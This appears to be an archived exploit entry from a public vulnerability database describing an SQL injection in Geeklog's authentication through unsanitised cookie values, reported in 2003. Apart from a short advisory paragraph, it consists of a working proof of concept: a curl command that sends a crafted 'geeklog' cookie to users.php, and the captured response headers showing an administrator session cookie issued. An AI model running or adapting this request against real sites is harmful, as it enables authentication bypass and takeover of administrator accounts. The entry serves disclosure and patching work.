26 lines
No EOL
1.1 KiB
Text
26 lines
No EOL
1.1 KiB
Text
source: https://www.securityfocus.com/bid/7742/info
|
|
|
|
Geeklog is reported to be prone to SQL injection attacks during authentication. This is due to insufficient sanitization of cookie values, which could permit an attacker to inject SQL code. This issue could be exploited to compromise Geeklog or to potentially launch attacks against the database, allowing for disclosure of sensitive information or other consequences.
|
|
|
|
curl -b geeklog=2.1 -D header.txt http://www.example.com/users.php
|
|
|
|
header.txt contains valid session information for the administrative user:
|
|
|
|
----------------header.txt -------------------------
|
|
|
|
HTTP/1.1 200 OK
|
|
Date: Sat, 17 May 2003 16:15:23 GMT
|
|
Server: Apache
|
|
Set-Cookie: gl_session=1828197392; path=/
|
|
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
|
|
path=/
|
|
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22
|
|
GMT; path=/; domain=http://www.example.com
|
|
Transfer-Encoding: chunked
|
|
Content-Type: text/html; charset=iso-8859-1
|
|
|
|
10
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
|
|
|
|
|
----------------header.txt -------------------------- |